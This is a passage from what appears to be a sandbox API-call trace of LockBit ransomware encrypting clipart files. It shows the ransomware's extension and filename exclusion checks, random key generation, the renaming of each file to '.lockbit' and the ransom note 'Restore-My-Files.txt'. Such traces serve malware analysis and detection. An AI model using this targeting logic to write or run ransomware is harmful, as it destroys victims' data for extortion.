wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.048] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.048] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c816800, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9c816800, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x10f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00687_.WMF", cAlternateFileName="")) returned 1 [0118.054] lstrcmpiW (lpString1=".", lpString2="HH00687_.WMF") returned -1 [0118.054] lstrcmpiW (lpString1="..", lpString2="HH00687_.WMF") returned -1 [0118.054] PathFindExtensionW (pszPath="HH00687_.WMF") returned=".WMF" [0118.054] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.054] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.055] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.055] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00687_.WMF") returned 1 [0118.056] lstrcmpiW (lpString1="ntldr", lpString2="HH00687_.WMF") returned 1 [0118.056] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00687_.WMF") returned 1 [0118.056] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00687_.WMF") returned -1 [0118.056] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00687_.WMF") returned -1 [0118.056] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00687_.WMF") returned 1 [0118.056] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00687_.WMF") returned 1 [0118.056] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.056] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF") returned=".WMF" [0118.056] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.056] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.056] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.057] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.058] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.058] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.058] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.058] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF.lockbit") returned 72 [0118.058] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0118.059] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.059] malloc (_Size=0x40068) returned 0x3ef0008 [0118.059] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=4340) returned 1 [0118.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.059] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0118.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0118.060] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.067] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.067] malloc (_Size=0xa6) returned 0x77d7a8 [0118.067] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.068] free (_Block=0x77d7a8) [0118.068] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.068] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.069] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.069] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x159db100, ftCreationTime.dwHighDateTime=0x1bd4b1e, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x159db100, ftLastWriteTime.dwHighDateTime=0x1bd4b1e, nFileSizeHigh=0x0, nFileSizeLow=0x1bac, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00688_.WMF", cAlternateFileName="")) returned 1 [0118.069] lstrcmpiW (lpString1=".", lpString2="HH00688_.WMF") returned -1 [0118.069] lstrcmpiW (lpString1="..", lpString2="HH00688_.WMF") returned -1 [0118.069] PathFindExtensionW (pszPath="HH00688_.WMF") returned=".WMF" [0118.069] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.069] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.070] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.070] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00688_.WMF") returned 1 [0118.071] lstrcmpiW (lpString1="ntldr", lpString2="HH00688_.WMF") returned 1 [0118.071] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00688_.WMF") returned 1 [0118.071] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00688_.WMF") returned -1 [0118.071] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00688_.WMF") returned -1 [0118.071] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00688_.WMF") returned 1 [0118.071] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00688_.WMF") returned 1 [0118.071] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.071] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF") returned=".WMF" [0118.071] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.071] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.071] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.072] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.073] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF.lockbit") returned 72 [0118.073] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0118.073] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.074] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.074] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7084) returned 1 [0118.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.075] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.075] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.079] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.079] malloc (_Size=0xa6) returned 0x77d7a8 [0118.079] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.080] free (_Block=0x77d7a8) [0118.080] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.080] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.080] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b503b00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x538951f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9b503b00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1bba, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00693_.WMF", cAlternateFileName="")) returned 1 [0118.081] lstrcmpiW (lpString1=".", lpString2="HH00693_.WMF") returned -1 [0118.081] lstrcmpiW (lpString1="..", lpString2="HH00693_.WMF") returned -1 [0118.081] PathFindExtensionW (pszPath="HH00693_.WMF") returned=".WMF" [0118.081] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.081] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.082] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.082] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.083] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00693_.WMF") returned 1 [0118.083] lstrcmpiW (lpString1="ntldr", lpString2="HH00693_.WMF") returned 1 [0118.083] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00693_.WMF") returned 1 [0118.083] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00693_.WMF") returned -1 [0118.083] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00693_.WMF") returned -1 [0118.083] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00693_.WMF") returned 1 [0118.084] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00693_.WMF") returned 1 [0118.084] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.084] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF") returned=".WMF" [0118.084] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.084] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.084] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.084] 